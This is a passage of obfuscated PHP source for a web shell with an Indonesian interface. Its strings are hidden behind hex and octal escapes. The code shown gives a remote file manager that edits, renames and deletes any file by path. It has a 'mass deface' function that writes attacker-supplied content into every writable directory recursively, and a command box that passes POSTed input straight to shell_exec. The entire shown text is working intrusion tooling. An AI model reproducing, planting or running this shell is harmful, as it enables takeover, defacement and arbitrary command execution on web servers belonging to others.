"\x22\76\12\x9\11\74\x69\x6e\160\x75\164\40\x74\171\160\145\x3d\x22\150\151\x64\144\x65\156\42\40\x6e\x61\x6d\145\75\42\157\160\164\x22\x20\166\141\154\x75\145\75\42\147\x61\156\x74\x69\137\x6e\141\x6d\141\x22\x3e\12\11\11\x3c\x69\156\x70\165\164\40\143\x6c\141\x73\x73\x3d\42\142\164\x6e\x20\142\164\x6e\x2d\x6f\165\x74\x6c\x69\x6e\x65\55\x6c\151\x67\150\164\x20\x62\x74\x6e\x2d\163\155\x22\x20\x74\171\x70\x65\x3d\x22\163\x75\142\155\151\164\x22\40\166\141\154\165\x65\x3d\x22\x67\141\x6e\164\151\x20\x6e\141\x6d\x61\x22\x2f\x3e\xa\x9\x3c\57\x64\x69\166\x3e\12\74\57\x66\157\x72\155\x3e"; } elseif ($_POST["\x6f\160\164"] == "\x65\x64\151\164") { if (isset($_POST["\163\x72\x63"])) { $fp = fopen($_POST["\160\141\164\150"], "\167"); if (fwrite($fp, $_POST["\x73\x72\x63"])) { echo "\74\x73\x74\x72\x6f\x6e\x67\x3e\x45\x64\151\x74\x3c\57\x73\164\162\157\x6e\147\x3e\x20\157\153\41\40" . ok() . "\x3c\57\144\x69\x76\x3e"; } else { echo "\x3c\163\x74\x72\x6f\156\x67\x3e\105\144\151\x74\74\57\x73\164\x72\x6f\156\147\x3e\40\x67\141\147\x61\x6c\41\x20" . er() . "\74\57\x64\x69\x76\76"; } fclose($fp); } echo "\xa\74\144\151\166\40\x63\154\141\163\163\x3d\42\155\142\55\63\42\76\12\11\74\x66\x6f\162\x6d\40\155\145\x74\150\157\144\75\x22\120\x4f\123\x54\x22\x3e\12\11\11\x3c\x74\x65\x78\x74\141\x72\145\141\x20\143\x6c\x61\x73\163\75\x22\146\x6f\x72\x6d\55\x63\157\156\164\x72\x6f\x6c\x20\x66\157\x72\155\x2d\143\157\156\164\x72\x6f\x6c\x2d\163\x6d\x20\155\x62\55\x33\42\x20\162\157\x77\x73\x3d\42\x37\42\40\x6e\x61\x6d\x65\75\x22\x73\x72\143\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\x70\x61\x74\x68"])) . "\74\x2f\164\x65\x78\x74\141\x72\145\x61\76\12\x9\11\x9\74\x69\x6e\x70\x75\x74\40\164\x79\160\x65\75\42\150\x69\144\x64\145\156\42\40\x6e\x61\x6d\x65\75\x22\160\141\164\x68\x22\40\x76\141\x6c\165\145\x3d\x22" . $_POST["\x70\x61\164\150"] . "\x22\76\xa\x9\x9\11\x3c\x69\x6e\x70\165\164\40\164\x79\160\x65\x3d\x22\150\x69\x64\144\145\156\42\x20\x6e\x61\155\145\x3d\42\157\x70\164\x22\x20\166\x61\154\165\x65\x3d\42\145\x64\x69\164\x22\76\12\x9\11\74\x69\x6e\x70\x75\164\40\x63\x6c\141\163\163\x3d\x22\x62\164\x6e\x20\142\x74\x6e\55\157\x75\164\154\151\x6e\145\55\x6c\x69\x67\150\164\x20\x62\x74\x6e\x2d\163\x6d\40\142\164\x6e\55\x62\154\x6f\143\x6b\x22\40\164\x79\x70\x65\75\42\x73\x75\x62\155\151\164\x22\x20\166\141\x6c\165\x65\75\42\145\x64\x69\x74\x22\x2f\x3e\xa\x9\x3c\57\x66\x6f\x72\155\x3e\12\x3c\57\144\151\x76\76"; } } else { if (isset($_GET["\x6f\160\x74\x69\x6f\156"]) && $_POST["\157\160\164"] == "\150\141\160\x75\163") { if ($_POST["\x74\171\x70\x65"] == "\144\151\162") { if (rmdir($_POST["\160\141\164\150"])) { echo "\74\x73\x63\x72\x69\160\x74\x3e\167\151\156\x64\x6f\x77\56\154\x6f\143\141\x74\151\157\x6e\x3d\47\x3f\x70\x61\164\x68\x3d{$path}\x27\x3c\57\163\143\162\x69\160\x74\76"; } else { echo "\74\x73\164\x72\x6f\x6e\147\76\x48\x61\160\165\163\40\144\x69\162\74\x2f\163\164\162\157\156\147\76\40\x67\x61\147\141\154\41\40" . er() . "\x3c\57\144\x69\x76\x3e"; } } elseif ($_POST["\164\x79\160\x65"] == "\146\x69\154\x65") { if (unlink($_POST["\160\x61\164\150"])) { echo "\x3c\163\143\x72\x69\x70\164\76\167\151\x6e\x64\157\x77\x2e\x6c\157\143\x61\164\151\157\x6e\75\47\x3f\x70\x61\x74\150\x3d{$path}\47\x3c\57\x73\x63\x72\x69\x70\x74\x3e"; } else { echo "\74\163\x74\162\157\156\147\x3e\110\141\x70\165\163\40\x66\151\154\x65\74\57\163\x74\162\157\x6e\147\x3e\40\147\141\147\141\x6c\41\40" . er() . "\x3c\x2f\x64\x69\x76\x3e"; } } } $scandir = scandir($path); $pa = getcwd(); echo "\12\x3c\144\x69\166\40\143\154\x61\x73\x73\x3d\x22\x62\153\160\x20\x74\141\x62\154\145\55\162\145\x73\x70\x6f\x6e\163\x69\x76\145\42\x3e\12\x3c\164\x61\x62\154\x65\40\x63\x6c\141\163\x73\x3d\42\164\x61\142\154\145\40\164\141\142\154\x65\x2d\150\157\x76\145\x72\x20\x74\141\x62\154\145\55\x64\141\x72\153\x20\164\145\x78\x74\x2d\x6c\x69\147\150\164\40\155\164\55\x34\42\76\xa\74\x74\x68\145\141\x64\76\xa\x3c\x74\162\x3e\xa\x9\74\164\144\x20\143\x6c\141\163\x73\75\42\164\145\170\x74\x2d\143\145\156\164\145\x72\42\x3e\x4e\x61\155\145\x3c\57\x74\x64\x3e\12\11\11\x3c\164\x64\x20\x63\154\x61\x73\163\75\42\164\x65\170\x74\x2d\x63\x65\156\x74\145\162\x22\76\x4c\141\163\164\x20\105\144\151\164\x3c\x2f\x74\144\x3e\12\x9\11\74\164\144\x20\x63\154\x61\163\x73\x3d\42\x74\x65\170\x74\x2d\x63\x65\156\x74\x65\162\x22\x3e\123\x69\172\145\74\57\x74\x64\x3e\12\x9\x9\74\x74\x64\40\143\154\x61\x73\163\75\x22\x74\145\x78\x74\x2d\x63\145\x6e\164\145\162\x22\x3e\117\167\x6e\145\x72\74\x67\x72\x3e\x3a\74\x2f\147\x72\x3e\x47\x72\x6f\x75\x70\x3c\57\164\144\76\12\11\11\74\x74\144\40\x63\x6c\x61\163\163\75\42\164\x65\170\164\x2d\x63\x65\156\164\145\x72\42\x3e\x50\x65\162\x6d\x69\x73\163\x69\157\x6e\74\x2f\x74\x64\x3e\xa\11\74\164\144\x20\x63\x6c\x61\163\163\75\x22\164\x65\170\164\x2d\x63\145\x6e\164\145\162\x22\76\x4f\160\x74\x69\157\156\163\74\x2f\164\144\76\xa\x3c\57\x74\162\x3e\12\x3c\x2f\164\150\145\x61\144\x3e\xa\x3c\164\142\157\144\x79\40\x63\x6c\x61\x73\163\75\42\x74\145\170\x74\x2d\156\157\x77\x72\141\x70\42\76\xa\74\164\x72\x3e\xa\11\x3c\x74\x64\x3e\x3c\x69\40\x63\x6c\141\x73\163\x3d\x22\x62\151\x20\142\151\x2d\x66\x6f\x6c\144\x65\162\62\55\x6f\x70\145\156\42\76\x3c\57\151\x3e\x3c\141\40\x63\154\x61\x73\x73\x3d\x22\164\145\170\x74\x2d\x64\x65\x63\157\x72\141\164\151\157\x6e\55\x6e\x6f\x6e\x65\40\164\x65\170\x74\x2d\x73\x65\143\x6f\x6e\144\x61\162\171\42\x20\x68\x72\145\x66\x3d\x22\x3f\160\x61\164\x68\75" . dirname($dir) . "\x22\76\x2e\56\74\x2f\x61\76\74\x2f\164\144\76\x3c\164\x64\x3e\x3c\x2f\x74\144\76\74\164\144\x3e\74\x2f\x74\x64\76\74\164\x64\76\x3c\x2f\x74\144\x3e\74\x74\x64\x3e\74\57\x74\x64\x3e\74\164\x64\40\143\x6c\x61\x73\163\75\x22\x74\x65\170\164\55\x63\145\x6e\x74\x65\x72\x22\76\xa\x9\x9\x3c\x64\151\x76\40\143\x6c\x61\x73\163\x3d\42\x62\x74\156\55\147\x72\157\x75\160\x22\76\xa\11\x9\x9\74\141\40\x63\x6c\141\x73\163\75\42\x62\x74\x6e\x20\142\x74\156\x2d\157\x75\164\154\x69\156\x65\x2d\x6c\151\147\x68\164\40\x62\164\x6e\x2d\163\155\x22\40\150\x72\145\146\x3d\x22\77\146\x69\154\x65\142\x61\162\x75\46\x70\x61\164\x68\x3d" . $dir . "\42\x3e\x3c\x69\x20\143\x6c\141\163\163\75\42\x62\x69\40\142\151\55\x66\151\154\145\x2d\x65\141\162\155\x61\x72\153\55\x70\x6c\x75\163\x2d\146\x69\x6c\154\42\x3e\74\57\x69\76\74\57\141\x3e\xa\x9\x9\11\74\141\40\x63\x6c\x61\163\x73\x3d\42\x62\164\x6e\40\142\164\x6e\x2d\x6f\x75\x74\x6c\x69\156\x65\55\154\x69\147\x68\164\40\142\164\156\55\163\x6d\42\x20\x68\x72\145\x66\x3d\x22\x3f\144\x69\x72\x62\x61\162\x75\x26\x70\141\164\x68\75" . $dir . "\42\76\x3c\x69\x20\143\154\141\x73\163\75\42\142\151\40\x62\151\55\146\157\x6c\144\145\x72\55\160\154\165\163\x22\76\x3c\x2f\151\x3e\74\57\141\x3e\xa\11\11\74\57\144\151\x76\x3e\xa\x9\x3c\57\164\x64\x3e\12\x3c\57\164\x72\x3e"; foreach ($scandir as $dir) { $dt = date("\x59\55\x6d\x2d\x64\x20\x48\x3a\151\x3a\x73", filemtime("{$path}\57{$dir}")); if (function_exists("\160\x6f\163\x69\x78\x5f\x67\x65\x74\160\167\x75\x69\144")) { $downer = @posix_getpwuid(fileowner("{$path}\57{$dir}")); $downer = $downer["\156\x61\x6d\x65"]; } else { $downer = fileowner("{$path}\57{$dir}"); } if (function_exists("\x70\157\163\x69\170\x5f\147\145\x74\147\162\147\x69\144")) { $dgrp = @posix_getgrgid(filegroup("{$path}\57{$dir}")); $dgrp = $dgrp["\156\x61\x6d\x65"]; } else { $dgrp = filegroup("{$path}\x2f{$dir}"); } if (!is_dir("{$path}\57{$dir}") || $dir == "\56" || $dir == "\56\x2e") { continue; } echo "\12\x3c\164\162\x3e\xa\11\74\x74\x64\76\x3c\151\40\x63\x6c\141\163\x73\75\47\x62\x69\x20\x62\x69\55\146\157\x6c\144\145\162\55\146\x69\154\154\x27\x3e\74\x2f\151\76\74\x61\40\143\x6c\141\163\x73\75\47\x74\145\170\164\x2d\144\145\x63\x6f\x72\x61\164\151\157\156\55\x6e\157\x6e\x65\40\164\145\170\x74\55\x69\156\146\157\x27\40\150\162\145\146\x3d\x22\x3f\160\141\164\x68\x3d{$path}\x2f{$dir}\42\x3e{$dir}\x3c\x2f\141\76\x3c\57\164\x64\76\12\11\x3c\164\144\40\143\154\141\163\x73\75\x27\x74\145\x78\164\x2d\143\x65\x6e\164\145\x72\x27\x3e{$dt}\74\57\164\x64\x3e\12\x9\x3c\x74\144\x20\143\x6c\141\163\x73\x3d\47\x74\145\x78\164\55\x63\145\156\164\x65\x72\47\x3e\55\74\57\x74\x64\76\xa\x9\74\164\x64\x20\143\154\141\x73\x73\75\x27\x74\145\x78\164\55\x63\145\156\164\x65\162\x27\x3e{$downer}\x3c\147\x72\x3e\72\x3c\x2f\x67\162\76{$dgrp}\74\x2f\164\x64\x3e\12\x9\74\164\x64\40\143\154\141\x73\163\75\x27\x74\x65\x78\x74\55\x63\x65\156\164\145\x72\x27\76"; if (is_writable("{$path}\57{$dir}")) { echo "\x3c\x67\162\76"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\74\x72\x64\76"; } echo p("{$path}\57{$dir}"); if (is_writable("{$path}\x2f{$dir}") || !is_readable("{$path}\x2f{$dir}")) { echo "\x3c\x2f\147\162\x3e\x3c\x2f\x72\144\x3e\74\x2f\x74\x64\x3e"; } echo "\xa\x9\74\164\x64\x20\143\x6c\x61\163\x73\75\42\x74\145\x78\x74\55\x63\145\156\164\145\x72\42\76\12\x9\x3c\x66\157\x72\x6d\40\x6d\145\x74\x68\157\x64\75\42\120\x4f\x53\x54\x22\40\141\x63\x74\151\x6f\156\75\42\77\157\x70\164\x69\x6f\156\x26\160\141\164\150\x3d{$path}\42\76\12\11\11\x3c\144\151\166\40\143\154\x61\x73\x73\x3d\42\x62\164\x6e\55\147\162\x6f\x75\x70\42\76\12\11\11\11\74\142\x75\164\164\157\156\x20\x63\154\x61\x73\163\75\42\x62\x74\x6e\40\x62\x74\156\x2d\x6f\x75\x74\x6c\151\156\145\x2d\154\x69\x67\x68\164\x20\142\164\156\55\x73\x6d\42\40\x6e\141\155\145\75\42\x6f\160\x74\42\40\x76\141\154\x75\145\x3d\42\147\x61\156\164\151\137\x6e\141\x6d\141\42\x3e\74\x69\40\x63\x6c\141\163\163\75\x27\142\x69\40\142\151\55\x70\x65\156\143\151\x6c\x2d\146\151\x6c\154\47\76\74\57\x69\x3e\x3c\x2f\x62\x75\164\164\157\x6e\76\xa\11\11\11\74\x62\165\164\x74\157\x6e\x20\143\x6c\x61\x73\x73\x3d\42\x62\164\156\x20\x62\164\156\x2d\157\165\x74\x6c\x69\x6e\x65\55\144\141\156\x67\145\162\40\x62\x74\x6e\x2d\163\x6d\42\x20\x6e\x61\x6d\x65\75\42\x6f\160\164\42\40\166\141\154\165\145\75\42\x68\141\160\x75\163\x22\x3e\74\151\40\x63\x6c\141\x73\163\75\x27\142\151\x20\142\151\x2d\x74\x72\141\163\x68\55\x66\151\x6c\x6c\47\76\x3c\x2f\151\x3e\74\x2f\142\x75\164\164\x6f\156\76\xa\11\11\x3c\x2f\144\x69\166\76\12\x9\11\x3c\x69\156\x70\165\164\x20\164\x79\160\x65\x3d\x22\x68\x69\144\144\145\156\42\x20\x6e\x61\x6d\x65\75\x22\x74\x79\x70\x65\x22\x20\166\141\x6c\165\x65\x3d\x22\x64\151\x72\x22\76\xa\11\11\74\x69\156\160\x75\164\40\x74\x79\x70\145\x3d\42\x68\x69\x64\144\145\156\42\x20\x6e\141\x6d\145\x3d\42\x6e\x61\155\x65\42\x20\x76\x61\154\165\x65\x3d\x22{$dir}\42\76\12\11\x9\x3c\x69\x6e\160\x75\x74\x20\x74\x79\160\145\x3d\x22\150\151\144\x64\x65\156\x22\x20\156\141\155\145\x3d\x22\x70\x61\164\150\x22\40\166\x61\154\165\145\75\x22{$path}\x2f{$dir}\x22\x3e\12\11\74\x2f\146\157\x72\155\x3e\12\11\x3c\x2f\164\144\76\xa\x3c\57\164\162\x3e"; } foreach ($scandir as $file) { $ft = date("\131\55\x6d\55\x64\40\110\x3a\x69\72\163", filemtime("{$path}\x2f{$file}")); if (!is_file($path . "\57" . $file)) { continue; } if (function_exists("\x70\x6f\163\151\170\137\x67\145\164\x70\x77\x75\x69\x64")) { $fowner = @posix_getpwuid(fileowner("{$path}\x2f{$file}")); $fowner = $fowner["\156\141\155\x65"]; } else { $fowner = fileowner("{$path}\57{$file}"); } if (function_exists("\x70\x6f\x73\x69\170\137\147\x65\164\147\x72\x67\151\x64")) { $fgrp = @posix_getgrgid(filegroup("{$path}\57{$file}")); $fgrp = $fgrp["\156\141\x6d\145"]; } else { $fgrp = filegroup("{$path}\x2f{$file}"); } echo "\xa\74\164\162\x3e\xa\11\74\164\144\76\x3c\151\40\x63\x6c\x61\x73\x73\x3d\x27\x62\x69\x20\x62\151\55\x66\151\x6c\x65\55\145\141\x72\155\x61\x72\153\x2d\143\157\144\145\x2d\x66\151\x6c\154\47\x3e\74\x2f\151\x3e\x3c\141\40\143\x6c\x61\x73\x73\75\47\x74\x65\170\x74\55\x64\145\x63\157\x72\x61\x74\151\x6f\156\55\156\x6f\156\x65\40\164\x65\170\x74\55\163\145\x63\x6f\x6e\x64\141\162\171\x27\40\x68\162\x65\x66\x3d\x22\x3f\146\x69\x6c\145\x73\x72\143\75{$path}\x2f{$file}\x26\160\141\x74\150\75{$path}\x22\x3e{$file}\74\57\141\x3e\x3c\x2f\164\x64\76\xa\11\x3c\x74\x64\40\x63\x6c\141\163\x73\x3d\x27\164\145\170\164\x2d\x63\x65\x6e\164\145\x72\x27\76{$ft}\x3c\x2f\x74\144\76\xa\11\74\x74\144\x20\x63\154\x61\163\163\x3d\47\164\145\170\x74\x2d\x63\x65\x6e\164\x65\162\x27\x3e" . sz(filesize($file)) . "\x3c\57\164\x64\x3e\xa\11\x3c\x74\144\40\143\x6c\141\x73\163\x3d\47\164\145\170\x74\55\143\145\156\164\145\162\x27\x3e{$fowner}\74\147\x72\76\x3a\74\x2f\147\x72\x3e{$fgrp}\x3c\57\164\144\76\xa\x9\74\164\144\x20\143\x6c\x61\163\163\x3d\47\x74\x65\x78\164\x2d\143\x65\x6e\164\145\x72\x27\x3e"; if (is_writable("{$path}\x2f{$file}")) { echo "\74\x67\x72\76"; } elseif (!is_readable("{$path}\x2f{$file}")) { echo "\74\162\144\76"; } echo p("{$path}\x2f{$file}"); if (is_writable("{$path}\57{$file}") || !is_readable("{$path}\57{$file}")) { echo "\x3c\57\147\x72\76\x3c\57\162\x64\76\74\57\164\144\76"; } echo "\xa\x9\x3c\164\144\x20\x63\x6c\141\x73\x73\x3d\42\164\145\170\164\55\143\x65\156\x74\x65\x72\42\x3e\12\x9\x9\74\146\x6f\x72\155\x20\155\145\164\x68\x6f\144\x3d\42\120\x4f\123\x54\42\40\141\143\x74\x69\x6f\x6e\75\42\77\x6f\x70\164\x69\157\x6e\x26\x70\x61\164\x68\x3d{$path}\x22\x3e\12\x9\11\x9\74\x64\151\166\x20\143\x6c\141\x73\163\x3d\x22\142\x74\156\55\x67\x72\x6f\165\x70\42\x3e\xa\11\11\x9\x9\x3c\x62\x75\164\164\x6f\156\x20\143\154\x61\163\163\x3d\42\x62\x74\156\x20\142\164\156\55\x6f\165\x74\x6c\151\x6e\145\55\x77\x61\x72\x6e\151\156\147\40\142\164\156\x2d\163\x6d\x22\x20\x6e\141\x6d\x65\75\x22\x6f\160\x74\x22\40\x76\141\154\x75\145\x3d\x22\145\x64\x69\x74\42\76\x3c\x69\40\143\x6c\x61\x73\x73\75\x27\x62\151\40\142\x69\x2d\160\145\x6e\x63\151\x6c\55\163\x71\x75\141\162\x65\x27\x3e\x3c\x2f\151\76\74\x2f\142\165\x74\164\x6f\x6e\76\12\11\11\x9\11\x3c\x62\165\164\164\157\156\40\143\154\x61\x73\x73\x3d\42\x62\164\x6e\x20\142\164\x6e\55\x6f\165\164\154\151\x6e\x65\55\154\x69\x67\x68\164\40\x62\164\x6e\x2d\163\155\42\40\x6e\141\x6d\x65\x3d\42\x6f\x70\x74\42\x20\x76\x61\x6c\x75\x65\75\x22\x67\x61\x6e\164\151\x5f\x6e\x61\x6d\x61\42\x3e\x3c\x69\40\x63\x6c\x61\x73\x73\75\47\x62\151\40\142\151\x2d\160\145\x6e\143\x69\154\x2d\x66\151\154\154\x27\76\x3c\x2f\x69\76\74\57\x62\165\x74\x74\x6f\156\76\12\11\x9\x9\11\74\142\165\x74\x74\157\156\x20\143\x6c\141\163\163\75\x22\142\164\156\40\x62\x74\x6e\x2d\x6f\165\164\154\151\x6e\x65\x2d\154\151\x67\150\164\x20\x62\164\x6e\55\163\155\x22\x20\156\141\155\x65\75\x22\x6f\160\x74\x22\x20\166\141\154\x75\x65\75\x22\144\157\x77\156\x6c\157\141\x64\42\x3e\x3c\151\40\143\154\141\x73\x73\x3d\47\142\151\x20\142\x69\x2d\x64\x6f\167\x6e\154\157\141\x64\x27\76\74\x2f\x69\76\74\x2f\x62\x75\164\x74\x6f\x6e\x3e\xa\x9\11\x9\11\74\142\165\x74\x74\157\x6e\40\143\x6c\x61\163\x73\75\x22\x62\x74\156\40\142\164\x6e\55\x6f\x75\x74\x6c\x69\x6e\x65\x2d\144\141\x6e\x67\145\162\x20\x62\164\156\x2d\x73\155\42\x20\156\141\155\x65\75\x22\157\160\164\x22\x20\166\141\x6c\x75\x65\75\x22\x68\x61\160\x75\x73\x22\76\x3c\x69\x20\x63\154\x61\163\x73\x3d\47\142\x69\x20\x62\x69\x2d\x74\x72\x61\x73\150\x2d\x66\151\x6c\x6c\47\x3e\x3c\57\151\76\x3c\57\x62\x75\x74\x74\157\156\x3e\12\11\11\x9\74\x2f\x64\151\x76\x3e\xa\x9\x9\x9\74\151\156\160\x75\164\40\x74\171\160\145\75\x22\150\151\x64\144\145\156\42\x20\156\141\155\x65\75\x22\164\171\160\x65\x22\x20\x76\141\x6c\165\145\75\42\x66\151\154\145\42\x3e\12\x9\x9\x9\74\151\156\160\x75\164\x20\164\171\x70\145\75\42\150\151\144\x64\145\156\42\x20\x6e\141\155\x65\x3d\42\156\141\155\145\x22\40\166\141\154\x75\145\x3d\42{$file}\42\x3e\xa\x9\11\11\74\151\156\x70\x75\164\x20\x74\x79\x70\145\x3d\x22\150\151\144\x64\145\156\42\x20\156\x61\155\145\x3d\x22\x70\141\x74\150\x22\x20\x76\x61\x6c\165\145\75\42{$path}\x2f{$file}\42\x3e\12\11\x9\x3c\x2f\146\157\x72\x6d\x3e\12\x9\x3c\57\164\144\x3e\12\74\x2f\164\162\76"; } } goto auUCq; vlR1j: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } if (isset($_GET["\155\x61\x73\x73\x5f\144\145\x66\x61\143\145"])) { echo "{$_s}"; function massSemua($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $pe = $dirc . "\x2f" . $namafile; if ($dirb === "\x2e") { file_put_contents($pe, $isi_script); } elseif ($dirb === "\x2e\56") { file_put_contents($pe, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\133\x3c\x67\162\76\74\x69\40\x63\x6c\141\163\163\x3d\x27\142\x69\40\142\151\x2d\143\150\145\143\x6b\x2d\141\x6c\154\x27\76\x3c\57\x69\x3e\74\x2f\x67\162\x3e\x5d\46\156\142\x73\160\73{$pe}\x3c\142\162\x3e"; file_put_contents($pe, $isi_script); $pathPattern = massSemua($dirc, $namafile, $isi_script); } } } } } } function massBiasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $pe = $dirc . "\x2f" . $namafile; if ($dirb === "\56") { file_put_contents($pe, $isi_script); } elseif ($dirb === "\56\x2e") { file_put_contents($pe, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\133\x3c\x67\162\x3e\x3c\151\x20\143\154\141\x73\x73\75\47\142\151\40\x62\x69\55\143\x68\145\x63\x6b\55\141\x6c\154\47\76\x3c\x2f\151\x3e\74\57\x67\x72\x3e\135\x26\156\x62\163\160\73{$dirb}\57{$namafile}\x3c\142\162\76"; file_put_contents($pe, $isi_script); } } } } } } if ($_POST["\x73\164\x61\162\x74"]) { if ($_POST["\164\151\160\145"] == "\x6d\141\163\163\141\x6c") { massSemua($_POST["\x64\x5f\144\151\162"], $_POST["\144\x5f\x66\x69\154\145"], $_POST["\163\x63\162\x69\x70\x74"]); } elseif ($_POST["\x74\x69\160\x65"] == "\142\151\141\163\141") { massBiasa($_POST["\x64\x5f\144\x69\162"], $_POST["\x64\x5f\x66\151\x6c\145"], $_POST["\163\x63\162\x69\160\164"]); } echo "\x3c\x62\162\x3e"; } echo "\12\x3c\144\x69\166\x20\143\154\141\163\163\75\x27\x6d\142\x2d\63\x27\76\xa\11\x3c\x66\157\x72\155\x20\155\x65\164\x68\157\x64\75\47\120\x4f\x53\x54\47\76\12\11\124\151\160\x65\72\xa\11\74\144\151\166\x20\x63\154\x61\163\163\x3d\x27\x63\x75\x73\164\157\155\55\x63\x6f\x6e\x74\162\157\x6c\x20\x63\165\x73\164\157\x6d\55\163\167\151\x74\143\x68\47\76\xa\11\11\x3c\151\156\160\x75\164\x20\143\154\141\163\x73\75\47\143\x75\x73\164\157\155\55\143\157\156\x74\x72\x6f\154\55\x69\156\160\165\164\47\40\164\171\160\145\x3d\47\x63\x68\145\143\153\142\x6f\170\x27\40\x69\144\75\47\x63\165\163\x74\157\155\x53\x77\151\x74\143\150\47\40\x6e\x61\x6d\x65\x3d\x27\x74\151\x70\x65\x27\40\x76\x61\x6c\165\145\x3d\x27\142\x69\141\x73\141\x27\x3e\xa\11\x9\74\154\141\x62\145\x6c\40\x63\154\141\x73\163\75\x27\143\165\163\x74\157\x6d\55\x63\157\x6e\164\x72\x6f\x6c\x2d\x6c\x61\142\x65\x6c\x27\40\x66\x6f\x72\75\x27\x63\165\x73\164\157\155\x53\x77\151\x74\143\x68\x27\x3e\102\x69\141\163\x61\x3c\x2f\x6c\x61\142\145\154\x3e\12\x9\x3c\57\144\x69\x76\x3e\xa\x9\x3c\144\x69\166\40\x63\154\141\x73\163\x3d\x27\143\x75\163\164\157\155\x2d\x63\x6f\x6e\x74\x72\x6f\154\x20\x63\165\x73\x74\x6f\x6d\x2d\x73\x77\151\x74\143\150\x27\x3e\12\x9\11\x3c\x69\156\160\165\x74\40\143\154\141\163\x73\75\47\143\x75\x73\x74\x6f\155\55\143\x6f\x6e\x74\x72\157\154\x2d\151\156\x70\x75\164\x27\40\164\171\x70\145\75\47\143\x68\x65\143\153\x62\157\x78\x27\x20\x69\x64\75\47\x63\165\163\x74\x6f\x6d\123\x77\151\x74\x63\150\x31\47\x20\156\141\155\145\x3d\47\x74\x69\x70\x65\47\40\166\x61\x6c\165\145\75\x27\x6d\x61\163\163\141\154\x27\76\12\x9\11\74\x6c\x61\x62\x65\x6c\40\143\154\x61\x73\x73\75\47\x63\x75\163\164\x6f\155\x2d\143\157\x6e\164\162\157\154\x2d\154\141\x62\145\154\x27\x20\x66\x6f\162\75\x27\143\165\x73\x74\157\x6d\x53\x77\x69\x74\x63\x68\x31\x27\76\x4d\141\163\163\141\154\x3c\x2f\x6c\x61\x62\x65\154\x3e\12\x9\74\57\x64\x69\166\x3e\12\x9\11\74\151\x20\x63\x6c\x61\163\x73\75\47\142\151\x20\142\x69\55\x66\x6f\x6c\x64\x65\162\x27\x3e\x3c\57\x69\76\x20\114\x6f\x6b\141\163\151\72\12\x9\11\74\x69\156\160\165\x74\40\143\154\141\x73\163\x3d\x27\x66\157\x72\x6d\x2d\143\157\156\x74\162\x6f\x6c\x20\142\164\x6e\55\163\155\47\40\164\x79\x70\x65\x3d\47\164\x65\170\164\x27\x20\x6e\x61\x6d\x65\75\x27\144\137\x64\151\162\47\x20\166\x61\x6c\165\145\x3d\x27{$dir}\47\76\xa\x9\x9\74\x69\40\x63\154\x61\x73\163\75\x27\142\x69\40\142\x69\x2d\146\x69\154\x65\x2d\145\x61\162\x6d\141\x72\x6b\x27\x3e\x3c\57\151\76\40\116\x61\x6d\x61\x20\146\151\x6c\x65\72\12\x9\x9\74\x69\x6e\x70\x75\x74\40\143\x6c\141\x73\163\75\47\x66\157\162\155\x2d\143\157\x6e\164\162\157\x6c\40\142\x74\x6e\55\x73\155\47\40\x74\x79\x70\x65\75\x27\164\145\170\164\47\x20\156\x61\x6d\x65\x3d\47\144\137\146\x69\154\145\x27\40\160\154\141\x63\145\x68\157\x6c\x64\145\162\75\47\x6e\141\155\x61\40\146\x69\x6c\x65\47\x20{$_r}\76\xa\11\11\74\x69\40\x63\154\141\x73\163\x3d\47\x62\x69\40\x62\x69\55\x66\151\154\x65\x2d\x65\141\x72\x6d\x61\162\x6b\x27\x3e\x3c\x2f\x69\76\x20\x49\x73\x69\40\x66\x69\x6c\145\72\xa\x9\11\x3c\x74\145\170\164\x61\x72\x65\141\40\x63\x6c\x61\x73\163\75\47\x66\157\162\x6d\x2d\x63\x6f\156\164\x72\x6f\x6c\x20\142\x74\x6e\x2d\163\x6d\47\40\162\157\167\163\75\x27\67\x27\40\x6e\141\155\x65\75\47\163\143\x72\x69\160\x74\x27\x20\x70\x6c\x61\x63\145\150\x6f\154\144\145\162\x3d\47\x69\x73\151\x20\x66\x69\x6c\145\47\40{$_r}\x3e\74\57\x74\145\x78\164\141\x72\x65\141\x3e\xa\11\x9\74\x69\156\x70\165\164\40\143\x6c\x61\163\163\x3d\47\142\164\x6e\x20\142\x74\156\x2d\157\x75\164\154\151\156\145\55\154\151\x67\150\164\x20\142\x74\156\x2d\x73\x6d\40\x62\x74\x6e\x2d\142\x6c\157\x63\153\47\40\x74\171\160\x65\75\x27\x73\x75\x62\155\x69\x74\47\x20\156\141\x6d\x65\75\47\x73\164\141\x72\164\x27\40\166\x61\154\165\145\75\x27\x6d\x61\163\x73\x20\144\145\146\x61\143\145\x27\x3e\12\x9\x3c\57\146\x6f\x72\x6d\76\xa\74\57\x64\x69\166\76"; } if (isset($_GET["\143\x6d\144"])) { if (!empty($_POST["\143\x6d\x64"])) { $cmd = shell_exec($_POST["\x63\x6d\144"] . "\40\62\76\46\x31"); } echo "{$_s}\12\74\x64\151\166\40\x63\x6c\141\x73\x73\75\47\x6d\142\x2d\63\47\76\12\x3c\146\157\x72\x6d\40\x6d\x65\164\x68\157\144\75\47\120\x4f\x53\124\x27\x3e\xa\11\x3c\x64\x69\166\x20\143\154\141\x73\x73\75\x27\151\156\160\x75\x74\x2d\x67\162\157\x75\160\x20\155\142\x2d\x33\47\x3e\xa\11\11\74\x69\156\160\x75\x74\x20\143\x6c\141\x73\163\x3d\x27\x66\157\x72\x6d\x2d\x63\x6f\156\164\x72\x6f\x6c\x20\142\x74\156\x2d\163\155\x27\40\164\x79\x70\x65\75\x27\x74\145\170\164\x27\x20\156\141\x6d\x65\75\x27\143\155\144\47\40\166\141\154\x75\x65\75\47" . htmlspecialchars($_POST["\x63\x6d\144"], ENT_QUOTES, "\x55\124\106\x2d\x38") . 